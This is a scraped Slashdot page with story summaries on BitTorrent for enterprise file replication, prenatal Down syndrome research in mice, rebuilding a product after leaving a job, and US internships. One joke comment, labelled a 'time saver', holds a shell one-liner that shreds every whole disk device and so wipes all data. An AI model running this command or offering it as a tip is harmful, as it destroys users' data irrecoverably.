Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Software

BitTorrent For Enterprise File Distribution? 291

HotTuna writes "I'm responsible for a closed, private network of retail stores connected to our corporate office (and to each other) with IPsec over DSL, and no access to the public internet. We have about 4GB of disaster recovery files that need to be replicated at each site, and updated monthly. The challenge is that all the enterprise file replication tools out there seem to be client/server and not peer-to-peer. This crushes our bandwidth at the corporate office and leaves hundreds of 7Mb DSL connections (at the stores) virtually idle. I am dreaming of a tool which can 'seed' different parts of a file to different peers, and then have those peers exchange those parts, rapidly replicating the file across the entire network. Sounds like BitTorrent you say? Sure, except I would need to 'push' the files out, and not rely on users to click a torrent file at each site. I could imagine a homebrew tracker, with uTorrent and an RSS feed at each site, but that sounds a little too patchwork to fly by the CIO. What do you think? Is BitTorrent an appropriate protocol for file distribution in the business sector? If not, why not? If so, how would you implement it?"
Medicine

Down's Symptoms May Be Treatable In the Womb 170

missb writes "US researchers have found that prenatal treatment for Down syndrome works in mice. This raises the possibility that a pregnant woman who knows her unborn child has Down syndrome might be able to forestall some of the symptoms before giving birth. When fetal mouse pups that had a syndrome similar to Down's were treated with nerve-protecting chemicals, some of the developmental delays that are part of the condition — such as motor and sensory abilities — were removed."
Patents

Rewriting a Software Product After Quitting a Job? 604

hi_caramba_2008 writes "We are a bunch of good friends at a large software company. The product we work on is under-budgeted and over-hyped by the sales drones. The code quality sucks, and management keeps pulling in different direction. Discussing this among ourselves, we talked about leaving the company and rebuilding the code from scratch over a few months. We are not taking any code with us. We are not taking customer lists (we probably will aim at different customers anyway). The code architecture will also be different — hosted vs. stand-alone, different modules and APIs. But at the feature level, we will imitate this product. Can we be sued for IP infringement, theft, or whatever? Are workers allowed to imitate the product they were working on? We know we have to deal with the non-compete clause in our employment contracts, but in our state this clause has been very difficult to enforce. We are more concerned with other IP legal aspects."

Comment A real time saver! (Score 2, Funny) 2362

ls -d /dev/* | egrep -e '^/dev/[h|s]d[a-z]$' | xargs -l1 -r shred -vfz -n 100

Summary: Reorganizes* the data on your disks for maximum read performance.

* Works on the assumption that having no data on your disks equates to an infinite performance boost in terms required data reads.
Businesses

IT Internship In the US For a Foreigner? 298

grk writes "I am from Europe, studying Business Informatics. I have plenty of IT-related work experience (from my part-time job and summer jobs) ranging from Project Management and Software Planning to Programming. In the 5th semester my curriculum has scheduled an internship for February 2009 preceding bachelor examinations and bachelor thesis. It will last for about three months. I would like to do my internship in the US, but I do not know how to start. Is it common to send unsolicited applications to companies in the US? Try the big corporations? Should I go for an employment agency? Which ones to choose from? What about the pay? Where I come from it is common to pay only a fraction of what your work is actually worth if it's called an 'internship.' Does this apply to the US as well? Any other recommendations?"

Slashdot Top Deals

The optimum committee has no members. -- Norman Augustine

Working...